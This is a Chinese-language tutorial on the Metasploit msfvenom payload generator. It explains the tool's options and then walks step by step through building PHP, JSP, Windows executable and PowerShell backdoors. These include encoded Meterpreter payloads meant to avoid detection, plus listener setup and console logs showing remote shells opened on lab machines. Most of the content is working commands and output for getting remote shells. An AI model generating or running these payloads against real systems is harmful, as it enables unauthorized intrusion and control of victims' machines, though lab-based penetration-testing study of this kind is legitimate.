msfvenom命令行选项如下:
Options:
-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, --nopsled <length> 为payload预先指定一个NOP滑动长度 -f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表) -e, --encoder [encoder] 指定需要使用的encoder(编码器) -a, --arch <architecture> 指定payload的目标架构 --platform <platform> 指定payload的目标平台 -s, --space <length> 设定有效攻击荷载的最大长度 -b, --bad-chars <list> 设定规避字符集,比如: '\x00\xff' -i, --iterations <count> 指定payload的编码次数 -c, --add-code <path> 指定一个附加的win32 shellcode文件 -x, --template <path> 指定一个自定义的可执行文件作为模板 -k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 --payload-options 列举payload的标准选项 -o, --out <path> 保存payload,可以用“>”号代替 -v, --var-name <name> 指定一个自定义的变量,以确定输出格式 --shellest 最小化生成payload -h, --help 查看帮助选项
–help-formats 查看msf支持的输出格式列表
root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats Executable formats asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war Transform formats bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
-f指定格式参数可以用单个大写字母代替:
例如:X 代表 -f exe
[H]arp [P]erl Rub[Y] [R]aw [J]s e[X]e [D]ll [V]BA [W]ar Pytho[N]
先看一下payload,到目前共有437个payload,大致归类不同的操作平台windows/linux/osx/android和不同的编程语言python/php等。
root@kali:~# msfvenom -l payloads
查看支持编码
root@kali:~# msfvenom -l encoders
如果你使用了-b选项(设定了规避字符集),会自动调用编码器。
其他情况下,你需要使用-e选项来使用编码模块,例如:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
也可以使用-i选项进行多次编码。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe
下面演示一些用法:
Kali:172.16.100.182
测试机:172.16.100.155
PHP利用msfvenom生成后门
查看下php相关payload
msfvenom -l payloads | grep php
这里我们用bind_php来测试
php/bind_php Listen for a connection and spawn a command shell via php
查看配置项
root@kali:~# msfvenom -p php/bind_php --payload-options
生成后门
msfvenom -p php/bind_php RHOST=172.16.100.155 R
去掉开头的/*
访问http://172.16.100.155/1.php查看监听
[root@vincenthostname html]# netstat -antlp | grep httpd tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1494/httpd
msf > use multi/handler msf exploit(handler) > set payload php/bind_php payload => php/bind_php msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (php/bind_php): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set rhost 172.16.100.155 rhost => 172.16.100.155 msf exploit(handler) > exploit [*] Exploit running as background job. [*] Started bind handler msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800
升级为Meterpreter
msf exploit(handler) > sessions -u 1 [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1] [*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 172.16.100.182:4433 [*] Sending stage (826840 bytes) to 172.16.100.155 [*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800 [+] negotiating tlv encryption [+] negotiated tlv encryption [+] negotiated tlv encryption [*] Command stager progress: 100.00% (736/736 bytes) msf exploit(handler) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell php/php 172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155) 2 meterpreter x86/linux uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155 172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155) msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter > sysinfo Computer : 172.16.100.155 OS : CentOS 6.5 (Linux 2.6.39) Architecture : x64 Meterpreter : x86/linux
JAVA利用msfvenom生成后门
查看下可以使用的payload
msfvenom -l payloads | grep java
这里我们使用
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp Payload size: 1500 bytes
访问后获取反弹shell
msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.100.182:4444
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows [°汾 6.1.7601]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£
E:\tomcat\bin>whoami
whoami
dell-pc\dell
Windows利用msfvenom生成后门
root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe
本地监听:
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 172.16.100.128 LHOST => 172.16.100.128 msf exploit(handler) > set LPORT 2345 LPORT => 2345 msf exploit(handler) > exploit [*] Started reverse handler on 172.16.100.128:2345 [*] Starting the payload handler... [*] Sending stage (885806 bytes) to 172.16.100.1 [*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800 meterpreter > sysinfo Computer : DELL-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32
Windows生成powershell后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set lhost 172.16.100.182 lhost => 172.16.100.182 msf exploit(handler) > set lport 6666 lport => 6666 msf exploit(handler) > exploit [*] Exploit running as background job. [*] Started reverse TCP handler on 172.16.100.182:6666
然后Windows下运行powershell -file “test.ps1”
msf exploit(handler) > [*] Sending stage (194623 bytes) to 172.16.100.1 [*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800 [+] negotiating tlv encryption [+] negotiated tlv encryption [+] negotiated tlv encryption msf exploit(handler) > sessions -i 6 [*] Starting interaction with 6... meterpreter > getuid Server username: dell-PC\dell
参考文章
http://www.freebuf.com/sectool/72135.html
http://www.huo119.com/post/909.shtm